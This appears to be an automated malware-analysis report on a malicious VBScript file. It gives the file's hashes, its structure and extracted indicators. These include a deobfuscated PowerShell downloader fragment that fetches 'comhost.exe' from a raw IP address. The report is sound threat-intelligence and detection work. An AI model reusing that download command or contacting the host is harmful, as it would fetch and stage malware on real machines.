Malicious
473949798b06cf667bdd198c894e89a2
VBScript | MD5: 473949798b06cf667bdd198c894e89a2 | Size: 770 B | text/vbscript
VBScript
MD5: 473949798b06cf667bdd198c894e89a2
Size: 770 B
text/vbscript
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | 473949798b06cf667bdd198c894e89a2
|
| Sha1 | 785b8800bca0b82dc4993917ab62802a0d71d40f
|
| Sha256 | 40d4d7b0bc47b1d30167dd7fc9bd6bd34d99b8e0ae2c4537f94716e58e7a5aeb
|
| Sha384 | fc0dda34b034d4e7afaae728e9a5ba636afd7c4cf29fd59a640ca2319ecd73c1be749407b134bfd381a1664e5a42a877
|
| Sha512 | 82339f422a92d509e3c657d38ba42cbf13d4af26ca6902435b7838adb286700aef6415294e0324af5df4e5bf40d1068de1cbe06331f4af9ab3f2f75a985d1bf9
|
| SSDeep | 24:KqahwANxb/2W7S7gkc0KHEXsvMMpV54Wfo6ML1Bk:BCV/2esgF0EvhpVy1Bk
|
| TLSH | 88012020942A8DD90F63A15184E62C18EDFAF7D133A5C4719B948D3D149228073DB849
|
File Structure
473949798b06cf667bdd198c894e89a2
Malicious
473949798b06cf667bdd198c894e89a2.deobfuscated.vbs
Malicious
[Command #0]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | http://62.113.66.137/comhost.exe |
| Deobfuscated PowerShell | "iwr -Uri 'http://62.113.66.137/comhost.exe' -OutFile '" |
473949798b06cf667bdd198c894e89a2 (770 B)
File Structure
473949798b06cf667bdd198c894e89a2
Malicious
473949798b06cf667bdd198c894e89a2.deobfuscated.vbs
Malicious
[Command #0]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | http://62.113.66.137/comhost.exe |
473949798b06cf667bdd198c894e89a2 |
| Deobfuscated PowerShell | "iwr -Uri 'http://62.113.66.137/comhost.exe' -OutFile '" Malicious |
473949798b06cf667bdd198c894e89a2 > 473949798b06cf667bdd198c894e89a2.deobfuscated.vbs > [Command #0] > [PowerShell Command] |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.